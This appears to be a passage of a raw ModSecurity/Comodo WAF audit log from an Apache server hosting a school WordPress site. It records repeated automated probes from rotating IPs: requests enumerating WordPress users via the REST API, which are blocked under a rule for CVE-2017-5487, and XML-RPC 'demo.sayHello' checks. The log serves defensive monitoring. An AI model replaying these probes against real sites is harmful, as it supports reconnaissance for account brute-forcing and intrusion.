AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --75cd4a74-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --75cd4a74-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746323137616823 15074 (- - -) Stopwatch2: 1746323137616823 15074; combined=26488, p1=341, p2=742, p3=0, p4=0, p5=12716, sr=69, sw=0, l=0, gc=12689 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --75cd4a74-Z-- --f798a601-A-- [04/May/2025:08:45:37 +0700] aBbGwechPF6irSergtv84wAAANQ 103.236.140.4 35172 103.236.140.4 8181 --f798a601-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.164.37 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.164.37 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --f798a601-C-- demo.sayHello --f798a601-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --f798a601-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746323137913951 5624 (- - -) Stopwatch2: 1746323137913951 5624; combined=4195, p1=511, p2=3445, p3=33, p4=33, p5=101, sr=69, sw=72, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f798a601-Z-- --994e9c79-A-- [04/May/2025:08:45:39 +0700] aBbGw-chPF6irSergtv85AAAANM 103.236.140.4 35174 103.236.140.4 8181 --994e9c79-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.107.59 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.107.59 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --994e9c79-C-- demo.sayHello --994e9c79-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --994e9c79-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746323139394508 4842 (- - -) Stopwatch2: 1746323139394508 4842; combined=3727, p1=478, p2=3036, p3=25, p4=23, p5=96, sr=122, sw=69, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --994e9c79-Z-- --4ff24239-A-- [04/May/2025:08:45:44 +0700] aBbGyGJEE9ao5dcyYWnuiQAAAIU 103.236.140.4 35182 103.236.140.4 8181 --4ff24239-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.203.75 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.203.75 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --4ff24239-C-- demo.sayHello --4ff24239-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --4ff24239-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746323144541394 4891 (- - -) Stopwatch2: 1746323144541394 4891; combined=3707, p1=434, p2=3065, p3=25, p4=24, p5=92, sr=66, sw=67, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4ff24239-Z-- --d85fdb35-A-- [04/May/2025:08:45:50 +0700] aBbGzvnZiHJYHUAF8Qfb5wAAAAU 103.236.140.4 35186 103.236.140.4 8181 --d85fdb35-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.177.212 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.177.212 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --d85fdb35-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d85fdb35-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746323150553599 3170 (- - -) Stopwatch2: 1746323150553599 3170; combined=1437, p1=469, p2=935, p3=0, p4=0, p5=32, sr=77, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d85fdb35-Z-- --d67da53c-A-- [04/May/2025:08:45:53 +0700] aBbG0echPF6irSergtv86QAAAMI 103.236.140.4 35190 103.236.140.4 8181 --d67da53c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.177.212 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.177.212 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --d67da53c-C-- demo.sayHello --d67da53c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --d67da53c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746323153141889 4930 (- - -) Stopwatch2: 1746323153141889 4930; combined=3944, p1=462, p2=3272, p3=28, p4=31, p5=88, sr=68, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d67da53c-Z-- --1528a861-A-- [04/May/2025:08:45:59 +0700] aBbG19sVQyl9V2B8Pt-wXAAAAEI 103.236.140.4 35194 103.236.140.4 8181 --1528a861-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 45.202.76.222 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.202.76.222 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --1528a861-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1528a861-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746323159849947 2433 (- - -) Stopwatch2: 1746323159849947 2433; combined=1134, p1=373, p2=734, p3=0, p4=0, p5=27, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1528a861-Z-- --8ad13379-A-- [04/May/2025:08:46:06 +0700] aBbG3vnZiHJYHUAF8Qfb6AAAAAY 103.236.140.4 35198 103.236.140.4 8181 --8ad13379-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 45.202.76.222 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.202.76.222 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --8ad13379-C-- demo.sayHello --8ad13379-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --8ad13379-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746323166192735 6510 (- - -) Stopwatch2: 1746323166192735 6510; combined=4723, p1=622, p2=3855, p3=38, p4=41, p5=99, sr=77, sw=68, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8ad13379-Z-- --863e6809-A-- [04/May/2025:08:46:57 +0700] aBbHEfnZiHJYHUAF8Qfb6wAAAAg 103.236.140.4 35210 103.236.140.4 8181 --863e6809-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.85.104 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.85.104 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --863e6809-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --863e6809-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746323217643337 3161 (- - -) Stopwatch2: 1746323217643337 3161; combined=1294, p1=433, p2=831, p3=0, p4=0, p5=29, sr=78, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --863e6809-Z-- --764ae271-A-- [04/May/2025:08:47:04 +0700] aBbHGPnZiHJYHUAF8Qfb7QAAAAo 103.236.140.4 35216 103.236.140.4 8181 --764ae271-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.85.104 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.85.104 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --764ae271-C-- demo.sayHello --764ae271-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --764ae271-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746323224101990 6493 (- - -) Stopwatch2: 1746323224101990 6493; combined=4645, p1=598, p2=3804, p3=39, p4=43, p5=97, sr=75, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --764ae271-Z-- --eb59e634-A-- [04/May/2025:08:47:05 +0700] aBbHGdsVQyl9V2B8Pt-wXgAAAEk 103.236.140.4 35218 103.236.140.4 8181 --eb59e634-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.86.211 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.86.211 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --eb59e634-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --eb59e634-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746323225859409 3178 (- - -) Stopwatch2: 1746323225859409 3178; combined=1367, p1=463, p2=814, p3=0, p4=0, p5=90, sr=96, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --eb59e634-Z-- --233fb636-A-- [04/May/2025:08:47:11 +0700] aBbHH9sVQyl9V2B8Pt-wYQAAAE4 103.236.140.4 35224 103.236.140.4 8181 --233fb636-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.86.211 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.86.211 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --233fb636-C-- demo.sayHello --233fb636-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --233fb636-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746323231673984 4576 (- - -) Stopwatch2: 1746323231673984 4576; combined=3582, p1=441, p2=2947, p3=22, p4=24, p5=87, sr=66, sw=61, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --233fb636-Z-- --88e3ab7c-A-- [04/May/2025:08:50:15 +0700] aBbH19sVQyl9V2B8Pt-wZgAAAFY 103.236.140.4 35246 103.236.140.4 8181 --88e3ab7c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.117.253 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.117.253 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --88e3ab7c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --88e3ab7c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746323415187920 3428 (- - -) Stopwatch2: 1746323415187920 3428; combined=1461, p1=481, p2=948, p3=0, p4=0, p5=32, sr=88, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --88e3ab7c-Z-- --7cbb932e-A-- [04/May/2025:08:50:22 +0700] aBbH3vnZiHJYHUAF8Qfb7gAAAAs 103.236.140.4 35250 103.236.140.4 8181 --7cbb932e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.117.253 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.117.253 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --7cbb932e-C-- demo.sayHello --7cbb932e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --7cbb932e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746323422585577 6652 (- - -) Stopwatch2: 1746323422585577 6652; combined=4749, p1=632, p2=3867, p3=38, p4=44, p5=99, sr=76, sw=69, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7cbb932e-Z-- --46f2e361-A-- [04/May/2025:08:56:29 +0700] aBbJTfnZiHJYHUAF8Qfb9QAAABQ 103.236.140.4 35368 103.236.140.4 8181 --46f2e361-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.86.1 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.86.1 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --46f2e361-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --46f2e361-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746323789530131 2940 (- - -) Stopwatch2: 1746323789530131 2940; combined=1287, p1=470, p2=786, p3=0, p4=0, p5=30, sr=84, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --46f2e361-Z-- --a851015f-A-- [04/May/2025:08:56:36 +0700] aBbJVGJEE9ao5dcyYWnukQAAAJE 103.236.140.4 35372 103.236.140.4 8181 --a851015f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.86.1 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.86.1 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --a851015f-C-- demo.sayHello --a851015f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --a851015f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746323796915371 5086 (- - -) Stopwatch2: 1746323796915371 5086; combined=3796, p1=462, p2=3120, p3=23, p4=27, p5=95, sr=67, sw=69, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a851015f-Z-- --78eb0c05-A-- [04/May/2025:09:02:33 +0700] aBbKufnZiHJYHUAF8QfcAgAAABU 103.236.140.4 35418 103.236.140.4 8181 --78eb0c05-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.72.165 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.72.165 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --78eb0c05-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --78eb0c05-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746324153120819 2892 (- - -) Stopwatch2: 1746324153120819 2892; combined=1257, p1=459, p2=768, p3=0, p4=0, p5=29, sr=75, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --78eb0c05-Z-- --4d1e8f24-A-- [04/May/2025:09:02:40 +0700] aBbKwGJEE9ao5dcyYWnukwAAAJQ 103.236.140.4 35422 103.236.140.4 8181 --4d1e8f24-B-- POST /xmlrpc.php HTTP/1.0 Host: 